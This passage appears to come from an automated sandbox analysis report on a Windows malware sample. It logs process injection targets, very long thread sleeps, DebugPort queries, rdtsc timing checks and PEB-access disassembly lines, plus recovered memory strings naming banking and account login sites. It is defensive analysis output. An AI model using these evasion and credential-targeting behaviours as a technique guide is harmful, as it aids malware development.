                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory allocated: D9C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeMemory allocated: E9C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory allocated: 18C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory allocated: 3350000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory allocated: 5350000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory allocated: 59B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory allocated: 69B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory allocated: 6AE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory allocated: 7AE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory allocated: C610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory allocated: D610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeMemory allocated: DAA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F821AE rdtsc 7_2_00F821AE
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2673Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4627Jump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeWindow / User API: threadDelayed 2462
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeWindow / User API: threadDelayed 7509
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.8 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.3 %
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe TID: 6696Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4580Thread sleep count: 2673 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6384Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3000Thread sleep count: 78 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4600Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5544Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5496Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe TID: 7108Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7136Thread sleep count: 2462 > 30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7136Thread sleep time: -4924000s >= -30000s
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7136Thread sleep count: 7509 > 30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7136Thread sleep time: -15018000s >= -30000s
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe TID: 6748Thread sleep time: -65000s >= -30000s
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe TID: 6748Thread sleep time: -45000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 6156Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 3112Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 46G3-7765.15.drBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: 46G3-7765.15.drBinary or memory string: global block list test formVMware20,11696497155
                Source: 46G3-7765.15.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: 46G3-7765.15.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: svchost.exe, 00000011.00000002.2874091543.0000018565258000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 46G3-7765.15.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: 46G3-7765.15.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: 46G3-7765.15.drBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: 46G3-7765.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: 46G3-7765.15.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: nufnwZ9IW.exe, 00000010.00000002.3313297868.0000000001509000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 46G3-7765.15.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: 46G3-7765.15.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: 46G3-7765.15.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: 46G3-7765.15.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: 46G3-7765.15.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: 46G3-7765.15.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: 46G3-7765.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: 46G3-7765.15.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: 46G3-7765.15.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: 46G3-7765.15.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: svchost.exe, 00000011.00000002.2873444655.000001855FC2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.000000000355A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                Source: firefox.exe, 00000018.00000002.1395548752.0000019CD306D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
                Source: 46G3-7765.15.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: 46G3-7765.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: 46G3-7765.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: 46G3-7765.15.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: 46G3-7765.15.drBinary or memory string: discord.comVMware20,11696497155f
                Source: 46G3-7765.15.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: 46G3-7765.15.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: 46G3-7765.15.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: 46G3-7765.15.drBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: 46G3-7765.15.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: 46G3-7765.15.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: 46G3-7765.15.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F821AE rdtsc 7_2_00F821AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004179B3 LdrLoadDll,7_2_004179B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB80E9 mov eax, dword ptr fs:[00000030h]7_2_00EB80E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAA0E3 mov ecx, dword ptr fs:[00000030h]7_2_00EAA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F360E0 mov eax, dword ptr fs:[00000030h]7_2_00F360E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAC0F0 mov eax, dword ptr fs:[00000030h]7_2_00EAC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF20F0 mov ecx, dword ptr fs:[00000030h]7_2_00EF20F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F320DE mov eax, dword ptr fs:[00000030h]7_2_00F320DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA80A0 mov eax, dword ptr fs:[00000030h]7_2_00EA80A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F760B8 mov eax, dword ptr fs:[00000030h]7_2_00F760B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F760B8 mov ecx, dword ptr fs:[00000030h]7_2_00F760B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F480A8 mov eax, dword ptr fs:[00000030h]7_2_00F480A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB208A mov eax, dword ptr fs:[00000030h]7_2_00EB208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDC073 mov eax, dword ptr fs:[00000030h]7_2_00EDC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36050 mov eax, dword ptr fs:[00000030h]7_2_00F36050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB2050 mov eax, dword ptr fs:[00000030h]7_2_00EB2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F46030 mov eax, dword ptr fs:[00000030h]7_2_00F46030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAA020 mov eax, dword ptr fs:[00000030h]7_2_00EAA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAC020 mov eax, dword ptr fs:[00000030h]7_2_00EAC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F34000 mov ecx, dword ptr fs:[00000030h]7_2_00F34000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE016 mov eax, dword ptr fs:[00000030h]7_2_00ECE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE016 mov eax, dword ptr fs:[00000030h]7_2_00ECE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE016 mov eax, dword ptr fs:[00000030h]7_2_00ECE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE016 mov eax, dword ptr fs:[00000030h]7_2_00ECE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE01F8 mov eax, dword ptr fs:[00000030h]7_2_00EE01F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F861E5 mov eax, dword ptr fs:[00000030h]7_2_00F861E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E1D0 mov eax, dword ptr fs:[00000030h]7_2_00F2E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E1D0 mov eax, dword ptr fs:[00000030h]7_2_00F2E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E1D0 mov ecx, dword ptr fs:[00000030h]7_2_00F2E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E1D0 mov eax, dword ptr fs:[00000030h]7_2_00F2E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E1D0 mov eax, dword ptr fs:[00000030h]7_2_00F2E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F761C3 mov eax, dword ptr fs:[00000030h]7_2_00F761C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F761C3 mov eax, dword ptr fs:[00000030h]7_2_00F761C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F821AE mov eax, dword ptr fs:[00000030h]7_2_00F821AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF0185 mov eax, dword ptr fs:[00000030h]7_2_00EF0185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3019F mov eax, dword ptr fs:[00000030h]7_2_00F3019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3019F mov eax, dword ptr fs:[00000030h]7_2_00F3019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3019F mov eax, dword ptr fs:[00000030h]7_2_00F3019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3019F mov eax, dword ptr fs:[00000030h]7_2_00F3019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54180 mov eax, dword ptr fs:[00000030h]7_2_00F54180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54180 mov eax, dword ptr fs:[00000030h]7_2_00F54180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAA197 mov eax, dword ptr fs:[00000030h]7_2_00EAA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAA197 mov eax, dword ptr fs:[00000030h]7_2_00EAA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAA197 mov eax, dword ptr fs:[00000030h]7_2_00EAA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6C188 mov eax, dword ptr fs:[00000030h]7_2_00F6C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6C188 mov eax, dword ptr fs:[00000030h]7_2_00F6C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84164 mov eax, dword ptr fs:[00000030h]7_2_00F84164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84164 mov eax, dword ptr fs:[00000030h]7_2_00F84164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F48158 mov eax, dword ptr fs:[00000030h]7_2_00F48158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F44144 mov eax, dword ptr fs:[00000030h]7_2_00F44144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F44144 mov eax, dword ptr fs:[00000030h]7_2_00F44144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F44144 mov ecx, dword ptr fs:[00000030h]7_2_00F44144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F44144 mov eax, dword ptr fs:[00000030h]7_2_00F44144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F44144 mov eax, dword ptr fs:[00000030h]7_2_00F44144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAC156 mov eax, dword ptr fs:[00000030h]7_2_00EAC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6154 mov eax, dword ptr fs:[00000030h]7_2_00EB6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6154 mov eax, dword ptr fs:[00000030h]7_2_00EB6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE0124 mov eax, dword ptr fs:[00000030h]7_2_00EE0124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F70115 mov eax, dword ptr fs:[00000030h]7_2_00F70115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5A118 mov ecx, dword ptr fs:[00000030h]7_2_00F5A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5A118 mov eax, dword ptr fs:[00000030h]7_2_00F5A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5A118 mov eax, dword ptr fs:[00000030h]7_2_00F5A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5A118 mov eax, dword ptr fs:[00000030h]7_2_00F5A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov eax, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov ecx, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov eax, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov eax, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov ecx, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov eax, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov eax, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov ecx, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov eax, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov ecx, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC02E1 mov eax, dword ptr fs:[00000030h]7_2_00EC02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC02E1 mov eax, dword ptr fs:[00000030h]7_2_00EC02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC02E1 mov eax, dword ptr fs:[00000030h]7_2_00EC02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA2C3 mov eax, dword ptr fs:[00000030h]7_2_00EBA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA2C3 mov eax, dword ptr fs:[00000030h]7_2_00EBA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA2C3 mov eax, dword ptr fs:[00000030h]7_2_00EBA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA2C3 mov eax, dword ptr fs:[00000030h]7_2_00EBA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA2C3 mov eax, dword ptr fs:[00000030h]7_2_00EBA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F862D6 mov eax, dword ptr fs:[00000030h]7_2_00F862D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC02A0 mov eax, dword ptr fs:[00000030h]7_2_00EC02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC02A0 mov eax, dword ptr fs:[00000030h]7_2_00EC02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F462A0 mov eax, dword ptr fs:[00000030h]7_2_00F462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F462A0 mov ecx, dword ptr fs:[00000030h]7_2_00F462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F462A0 mov eax, dword ptr fs:[00000030h]7_2_00F462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F462A0 mov eax, dword ptr fs:[00000030h]7_2_00F462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F462A0 mov eax, dword ptr fs:[00000030h]7_2_00F462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F462A0 mov eax, dword ptr fs:[00000030h]7_2_00F462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE284 mov eax, dword ptr fs:[00000030h]7_2_00EEE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE284 mov eax, dword ptr fs:[00000030h]7_2_00EEE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F30283 mov eax, dword ptr fs:[00000030h]7_2_00F30283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F30283 mov eax, dword ptr fs:[00000030h]7_2_00F30283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F30283 mov eax, dword ptr fs:[00000030h]7_2_00F30283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA826B mov eax, dword ptr fs:[00000030h]7_2_00EA826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB4260 mov eax, dword ptr fs:[00000030h]7_2_00EB4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB4260 mov eax, dword ptr fs:[00000030h]7_2_00EB4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB4260 mov eax, dword ptr fs:[00000030h]7_2_00EB4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F8625D mov eax, dword ptr fs:[00000030h]7_2_00F8625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6A250 mov eax, dword ptr fs:[00000030h]7_2_00F6A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6A250 mov eax, dword ptr fs:[00000030h]7_2_00F6A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F38243 mov eax, dword ptr fs:[00000030h]7_2_00F38243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F38243 mov ecx, dword ptr fs:[00000030h]7_2_00F38243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6259 mov eax, dword ptr fs:[00000030h]7_2_00EB6259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAA250 mov eax, dword ptr fs:[00000030h]7_2_00EAA250
